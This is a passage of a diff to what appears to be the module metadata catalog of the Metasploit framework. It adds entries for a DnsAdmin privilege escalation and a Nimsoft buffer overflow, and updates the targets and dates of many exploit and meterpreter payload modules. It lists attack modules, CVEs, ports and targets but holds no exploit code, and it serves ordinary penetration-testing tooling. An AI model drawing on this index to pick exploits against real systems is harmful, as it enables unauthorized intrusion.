confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows\n          Server version up to and including Windows Server 2019.",
+    "references": [
+      "URL-https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+      "URL-https://adsecurity.org/?p=4064",
+      "URL-http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-09-09 12:26:42 +0000",
+    "path": "/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/dnsadmin_serverlevelplugindll",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/docker_credential_wincred": {
    "name": "Docker-Credential-Wincred.exe Privilege Escalation",
    "fullname": "exploit/windows/local/docker_credential_wincred",
@@ -133488,7 +135429,7 @@
    "targets": [
      "Windows 7 x86"
    ],
-    "mod_time": "2020-05-05 21:28:51 +0000",
+    "mod_time": "2020-06-29 22:17:35 +0000",
    "path": "/modules/exploits/windows/local/ntusermndragover.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ntusermndragover",
@@ -139469,7 +141410,7 @@
      "Windows Dropper",
      "PowerShell Stager"
    ],
-    "mod_time": "2020-05-01 12:59:01 +0000",
+    "mod_time": "2020-08-14 13:11:38 +0000",
    "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/veeam_one_agent_deserialization",
@@ -140488,6 +142429,51 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/nimsoft/nimcontroller_bof": {
+    "name": "CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow",
+    "fullname": "exploit/windows/nimsoft/nimcontroller_bof",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-05",
+    "type": "exploit",
+    "author": [
+      "wetw0rk"
+    ],
+    "description": "This module exploits a buffer overflow within the CA Unified Infrastructure Management nimcontroller.\n          The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list\n          probe.\n\n          Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the\n          directory_list probe.",
+    "references": [
+      "CVE-2020-8010",
+      "CVE-2020-8012",
+      "URL-https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832",
+      "PACKETSTORM-156577"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 48000,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows Universal (x64) - v7.80.3132"
+    ],
+    "mod_time": "2020-07-24 15:50:00 +0000",
+    "path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/nimsoft/nimcontroller_bof",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/nntp/ms05_030_nntp": {
    "name": "MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow",
    "fullname": "exploit/windows/nntp/ms05_030_nntp",
@@ -141579,9 +143565,10 @@
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)",
      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
-      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
+      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)",
+      "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)"
    ],
-    "mod_time": "2020-04-20 20:06:52 +0000",
+    "mod_time": "2020-07-08 23:32:16 +0000",
    "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -143413,7 +145400,7 @@
      "Windows x32",
      "Windows x64"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-04 16:08:32 +0000",
    "path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ipass_pipe_exec",
@@ -143501,7 +145488,7 @@
    "targets": [
      "Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
    ],
-    "mod_time": "2019-12-03 20:22:05 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms04_007_killbill",
@@ -143557,7 +145544,7 @@
      "Windows 2000 English",
      "Windows XP English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms04_011_lsass.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms04_011_lsass",
@@ -143747,7 +145734,7 @@
      "Windows 2000 SP4",
      "Windows XP SP1"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms06_025_rras.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms06_025_rras",
@@ -143796,7 +145783,7 @@
      "(stack)  Windows XP SP1 Italian",
      "(wcscpy) Windows 2003 SP0"
    ],
-    "mod_time": "2019-12-03 06:32:02 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms06_040_netapi",
@@ -143937,7 +145924,7 @@
      "Windows 2000 SP4",
      "Windows XP SP0/SP1"
    ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms06_070_wkssvc.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms06_070_wkssvc",
@@ -143991,7 +145978,7 @@
      "Windows 2003 Server SP1-SP2 Italian",
      "Windows 2003 Server SP1-SP2 German"
    ],
-    "mod_time": "2019-05-23 07:01:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms07_029_msdns_zonename",
@@ -144110,7 +146097,7 @@
      "Windows 2003 SP2 French (NO NX)",
      "Windows 2003 SP2 French (NX)"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms08_067_netapi.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms08_067_netapi",
@@ -144245,7 +146232,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/ms10_061_spoolss.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms10_061_spoolss",
@@ -144338,7 +146325,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2020-04-20 20:06:52 +0000",
+    "mod_time": "2020-04-17 17:58:18 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -144447,7 +146434,7 @@
      "Native upload",
      "MOF upload"
    ],
-    "mod_time": "2020-05-14 16:41:54 +0000",
+    "mod_time": "2020-05-06 12:17:12 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_psexec",
@@ -144498,7 +146485,7 @@
    "targets": [
      "Windows 2000 / Windows XP / Windows 2003"
    ],
-    "mod_time": "2019-08-15 16:33:40 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/netidentity_xtierrpcpipe",
@@ -144532,7 +146519,7 @@
      "URL-http://sourceforge.net/projects/smbexec/"
    ],
    "platform": "Windows",
-    "arch": "x86, x64",
+    "arch": "",
    "rport": 445,
    "autofilter_ports": [
      139,
@@ -144546,9 +146533,10 @@
      "Automatic",
      "PowerShell",
      "Native upload",
-      "MOF upload"
+      "MOF upload",
+      "Command"
    ],
-    "mod_time": "2020-05-14 16:41:54 +0000",
+    "mod_time": "2020-07-30 09:34:24 +0000",
    "path": "/modules/exploits/windows/smb/psexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/psexec",
@@ -144694,7 +146682,7 @@
      "Execute payload (x64)",
      "Neutralize implant"
    ],
-    "mod_time": "2020-02-03 11:19:20 +0000",
+    "mod_time": "2020-05-07 20:22:56 +0000",
    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/smb_doublepulsar_rce",
@@ -144796,7 +146784,7 @@
    "targets": [
      "Automatic Targeting"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/timbuktu_plughntcommand_bof",
@@ -144839,7 +146827,7 @@
      "Automatic",
      "Native upload"
    ],
-    "mod_time": "2018-10-24 09:46:00 +0000",
+    "mod_time": "2020-05-13 16:34:47 +0000",
    "path": "/modules/exploits/windows/smb/webexec.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/webexec",
@@ -147211,7 +149199,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -147246,7 +149234,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -147281,7 +149269,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -147349,7 +149337,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -147384,7 +149372,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -147419,7 +149407,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -149828,7 +151816,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-16 16:03:14 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_python_ssl",
@@ -151242,7 +153230,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -151277,7 +153265,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -151312,7 +153300,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -151413,7 +153401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -151448,7 +153436,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -151483,7 +153471,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -151686,7 +153674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -151721,7 +153709,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -151756,7 +153744,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -151925,7 +153913,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -151960,7 +153948,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -151995,7 +153983,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -152099,7 +154087,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -152134,7 +154122,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -152169,7 +154157,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -152411,7 +154399,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -152446,7 +154434,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -152481,7 +154469,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-08-03 12:32:33 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -152654,7 +154642,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -152689,7 +154677,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -152724,7 +154712,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -152957,7 +154945,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -152992,7 +154980,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -153027,7 +155015,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -153062,7 +155050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -153097,7 +155085,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -153132,7 +155120,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -153269,7 +155257,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_http",
@@ -153304,7 +155292,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_https",
@@ -153339,7 +155327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -154156,7 +156144,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_http",
@@ -154191,7 +156179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_https",
@@ -154226,7 +156214,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter_reverse_tcp",
@@ -154937,7 +156925,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -154972,7 +156960,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -155007,7 +156995,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -155917,7 +157905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_http",
@@ -155952,7 +157940,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_https",
@@ -155987,7 +157975,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-03-30 15:30:03 +0000",
+    "mod_time": "2020-06-03 07:08:50 +0000",
    "path": "/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "osx/x64/meterpreter_reverse_tcp",
@@ -156953,7 +158941,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-09-03 18:25:26 +0000",
+    "mod_time": "2020-09-04 15:43:55 +0000",
    "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "php/meterpreter_reverse_tcp",
@@ -157075,7 +159063,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
    "references": [

    ],
@@ -157085,7 +159073,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/bind_tcp",
@@ -157109,7 +159097,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Listen for a connection with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
    "references": [

    ],
@@ -157119,7 +159107,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/bind_tcp_uuid",
@@ -157142,7 +159130,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
    "references": [

    ],
@@ -157152,7 +159140,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-04-21 16:06:36 +0000",
+    "mod_time": "2020-06-16 08:58:15 +0000",
    "path": "/modules/payloads/stagers/python/reverse_http.rb",
    "is_install_path": true,
    "ref_name": "python/meterpreter/reverse_http",
@@ -157175,7 +159163,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (2.5-2.7 & 3.1-3.6). Tunnel communication over HTTP using SSL",
